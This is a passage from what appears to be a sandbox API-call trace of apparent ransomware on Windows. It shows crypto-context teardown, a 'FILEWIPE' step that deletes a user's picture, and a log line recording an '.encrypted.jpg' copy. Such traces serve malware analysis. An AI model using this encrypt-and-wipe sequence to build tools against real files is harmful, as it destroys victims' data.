lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.751] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.751] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.757] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0040.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.757] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.758] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.758] CryptDestroyKey (hKey=0x7c2280) returned 1 [0040.758] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0040.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.758] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.758] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.758] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0040.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.758] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.758] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0040.759] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0040.759] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0040.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0040.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.759] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0040.759] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.759] FreeLibrary (hLibModule=0x754b0000) returned 1 [0040.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0040.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0040.759] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0040.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0040.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.759] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67638aa0, ftCreationTime.dwHighDateTime=0x1d5b857, ftLastAccessTime.dwLowDateTime=0x1b168b00, ftLastAccessTime.dwHighDateTime=0x1d5b5e8, ftLastWriteTime.dwLowDateTime=0x1b168b00, ftLastWriteTime.dwHighDateTime=0x1d5b5e8, nFileSizeHigh=0x0, nFileSizeLow=0xc43c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="HCAqLJKeYC.jpg", cAlternateFileName="HCAQLJ~1.JPG")) returned 0x7c2100 [0040.760] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.760] CharLowerBuffW (in: lpsz="byte[50236]", cchLength=0xb | out: lpsz="byte[50236]") returned 0xb [0040.760] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.760] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0040.760] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0040.760] FreeLibrary (hLibModule=0x76b40000) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.761] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0040.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.761] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0040.761] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\hcaqljkeyc.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0040.762] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.762] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0040.762] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.762] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.763] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.763] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0040.763] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.763] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.763] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.763] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg", lpFilePart=0x0) returned 0x3a [0040.763] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67638aa0, ftCreationTime.dwHighDateTime=0x1d5b857, ftLastAccessTime.dwLowDateTime=0x1b168b00, ftLastAccessTime.dwHighDateTime=0x1d5b5e8, ftLastWriteTime.dwLowDateTime=0x1800ed60, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xc43c, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="HCAqLJKeYC.jpg", cAlternateFileName="HCAQLJ~1.JPG")) returned 0x7c2100 [0040.763] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\hcaqljkeyc.jpg")) returned 1 [0040.765] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67638aa0, ftCreationTime.dwHighDateTime=0x1d5b857, ftLastAccessTime.dwLowDateTime=0x1b168b00, ftLastAccessTime.dwHighDateTime=0x1d5b5e8, ftLastWriteTime.dwLowDateTime=0x1800ed60, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xc43c, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="HCAqLJKeYC.jpg", cAlternateFileName="HCAQLJ~1.JPG")) returned 0 [0040.765] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.765] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.766] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.766] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.766] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.766] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.766] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.766] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.766] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.766] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.766] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0040.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0040.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.767] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0040.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.767] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0040.767] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.767] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.767] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0040.767] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.767] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.768] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0040.768] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2ed5, lpOverlapped=0x0) returned 1 [0040.769] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0040.769] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2ed5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.769] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.encrypted.jpg\r\n", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0040.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x47) returned 0x88e138 [0040.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.encrypted.jpg\r\n", cchWideChar=71, lpMultiByteStr=0x88e138, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.encrypted.jpg\r\n", lpUsedDefaultChar=0x0) returned 71 [0040.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0040.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0040.770] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x46, lpOverlapped=0x0) returned 1 [0040.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0040.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.770] CloseHandle (hObject=0x140) returned 1 [0040.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0040.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | 